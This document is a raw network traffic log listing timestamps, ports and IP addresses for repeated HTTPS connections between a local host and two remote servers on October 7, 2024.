Oct 7, 2024 03:15:19.946815968 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.947089911 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.947099924 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.947155952 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.947429895 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.947441101 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.948016882 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.948065042 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.948133945 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.948348045 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.948367119 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.574472904 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.575126886 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.575164080 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.575675964 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.575686932 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.581778049 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.582201004 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.582215071 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.582235098 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.582631111 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.582637072 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.582884073 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.582890987 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.583244085 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.583249092 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.583272934 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.583636999 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.583667040 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.583985090 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.583991051 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.623188972 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.623691082 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.623701096 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.624120951 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.624125957 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673338890 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673366070 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673429012 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.673463106 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673527956 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.673644066 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673693895 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673737049 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.673866034 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.673882961 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.673899889 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.673907042 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.677037954 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.677103043 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.677221060 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.677649021 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.677668095 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.680507898 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.680619001 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.680669069 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.680774927 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.680793047 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.680824041 CEST	49710	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.680830956 CEST	443	49710	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.681185007 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.681205034 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.681246996 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.681248903 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.681276083 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.681489944 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.681494951 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.681505919 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.681510925 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.682643890 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.682718039 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.682765961 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.684169054 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.684185982 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.684200048 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.684206009 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.687392950 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.687438965 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.687875986 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.688272953 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.688282013 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.688504934 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.688504934 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.688520908 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.688601017 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.688610077 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.689186096 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.689218044 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.689379930 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.689501047 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.689513922 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.726979971 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.727014065 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.727082968 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.727113962 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.727138042 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.727164984 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.727180004 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.737461090 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.737476110 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.737502098 CEST	49711	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.737509012 CEST	443	49711	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.743278027 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.743310928 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:20.744224072 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.772263050 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:20.772273064 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.339999914 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.340651989 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.340693951 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.341150045 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.341157913 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.344268084 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.344976902 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.345017910 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.345571995 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.345578909 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.355506897 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.356910944 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.356910944 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.356935024 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.356950998 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.375874996 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.376573086 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.376586914 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.376905918 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.376912117 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.434477091 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.442528009 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.442548037 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.442933083 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.442994118 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.443065882 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.443413019 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.443418980 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.444724083 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.444890022 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.444988012 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.446710110 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.446738005 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.446752071 CEST	49714	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.446759939 CEST	443	49714	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.446904898 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.446932077 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.447033882 CEST	49715	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.447041988 CEST	443	49715	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.459703922 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.460103035 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.460401058 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.460638046 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.460644007 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.460769892 CEST	49712	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.460773945 CEST	443	49712	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.462766886 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.462816000 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.462898970 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.463586092 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.463602066 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.463694096 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.464725018 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.464756966 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.464811087 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.464862108 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.464885950 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.465161085 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.465173960 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.465327024 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.465343952 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.483237982 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.483421087 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.483526945 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.484179974 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.484213114 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.484231949 CEST	49713	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.484239101 CEST	443	49713	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.487216949 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.487272978 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.487339973 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.487479925 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.487498999 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.540730953 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.540891886 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.540947914 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.541110039 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.541124105 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.541136980 CEST	49716	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.541142941 CEST	443	49716	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.545697927 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.545754910 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:21.545831919 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.545990944 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:21.546005011 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.100296021 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.101170063 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.101210117 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.101732969 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.101742983 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.103562117 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.104091883 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.104120970 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.104564905 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.104569912 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.112853050 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.113466978 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.113516092 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.114012003 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.114026070 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.136080980 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.136734009 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.136799097 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.137350082 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.137365103 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.194062948 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.194998026 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.195031881 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.195477009 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.195487976 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.199206114 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.199279070 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.199328899 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.199568987 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.199590921 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.199603081 CEST	49718	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.199609041 CEST	443	49718	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.203145981 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.203341961 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.203403950 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.203505993 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.203522921 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.203533888 CEST	49717	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.203538895 CEST	443	49717	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.204871893 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.204942942 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.205022097 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.205169916 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.205192089 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.205626965 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.205661058 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.205969095 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.205969095 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.206003904 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.213179111 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.213247061 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.213876009 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.213924885 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.213924885 CEST	49719	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.213951111 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.213965893 CEST	443	49719	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.216969013 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.217022896 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.217103958 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.217215061 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.217236042 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.237780094 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.237859964 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.237917900 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.238081932 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.238081932 CEST	49720	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.238131046 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.238158941 CEST	443	49720	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.241027117 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.241072893 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.241267920 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.242033958 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.242054939 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.840951920 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.841444969 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.841516972 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.842171907 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.842186928 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.857573032 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.858100891 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.858190060 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.858504057 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.858526945 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.887326956 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.887804985 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.887840033 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.888395071 CEST	49726	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.888402939 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.892616987 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.893429041 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.893445015 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.893978119 CEST	49724	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.893984079 CEST	443	49724	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.923638105 CEST	49704	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:22.924268961 CEST	49704	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:22.928447962 CEST	443	49704	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:22.928993940 CEST	49728	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:22.929039955 CEST	443	49728	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:22.929044008 CEST	443	49704	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:22.929105997 CEST	49728	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:22.933114052 CEST	49728	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:22.933130026 CEST	443	49728	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:22.940072060 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.940160036 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.940242052 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.940404892 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.940455914 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.940485954 CEST	49723	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.940502882 CEST	443	49723	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.943228960 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.943284035 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.943341017 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.943484068 CEST	49729	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.943501949 CEST	443	49729	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.957463980 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.957529068 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.957636118 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.957837105 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.957837105 CEST	49725	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.957885981 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.957916021 CEST	443	49725	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.959016085 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.959175110 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.959234953 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.959464073 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.959464073 CEST	49721	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.959490061 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.959505081 CEST	443	49721	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.960549116 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.960583925 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.960648060 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.960779905 CEST	49730	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.960800886 CEST	443	49730	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.962773085 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.962826967 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.963356018 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.963498116 CEST	49731	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:22.963514090 CEST	443	49731	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.987704039 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.987786055 CEST	443	49726	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:22.987837076 CEST	49726	443	192.168.2.5	13.107.246.45
